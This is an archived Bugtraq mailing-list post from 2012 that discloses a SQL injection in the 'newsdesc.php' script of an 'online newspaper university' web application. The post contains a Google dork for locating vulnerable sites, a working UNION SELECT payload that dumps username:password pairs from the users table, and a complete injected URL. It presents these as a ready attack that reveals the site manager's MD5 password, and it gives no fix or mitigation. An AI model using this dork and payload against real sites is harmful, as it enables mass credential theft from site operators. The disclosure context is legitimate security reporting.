[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

online newspaper university"newsdesc.php" SQL Injection Vulnerabilities

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: online newspaper university"newsdesc.php" SQL Injection Vulnerabilities
From: CrAzY_CrAcKeR@xxxxxxxxxxxxxxxxxxxxx
Date: Wed, 11 Apr 2012 21:29:14 GMT

##################################################################
# Title : online newspaper university "newsdesc.php" SQL Injection 
Vulnerabilities  
#
# Discovered By: CrAzY CrAcKeR
#
# Home  : Null
#
# Email : CrAzY_CrAcKeR@xxxxxxxxxxxxxxx
#
# date  : 12/4/2012
#
# d0rk:- inurl:"inurl:news/newsdesc.php"
#       
##################################################################
##################################################################     
#
#            +-+-+-+-+-+-+-+-+-+-+
#         --+CrAzY CrAcKeR+--
#            +-+-+-+-+-+-+-+-+-+-+
#
#
################################################################## 
##################################################################
# Example:-
#  
#  [-] http://www.???.com/news/newsdesc.php?id=(sql)
# 
# [-] Injection code.... ( 
0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%20-- )
#     
# [-] 
http://www.???.com/news/newsdesc.php?id=2+and+1=0+union+select+1,concat(username,0x3a,password),3,4,5,6%20FROM%20users%20--
#     
# [-]  you see  now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend  "A7eb Alwrd"
####################################################################

Prev by Date: [ MDVSA-2012:057 ] freetype2
Next by Date: [SECURITY] [DSA 2449-1] sqlalchemy security update
Previous by thread: [ MDVSA-2012:057 ] freetype2
Next by thread: [SECURITY] [DSA 2449-1] sqlalchemy security update
Index(es):
- Date
- Thread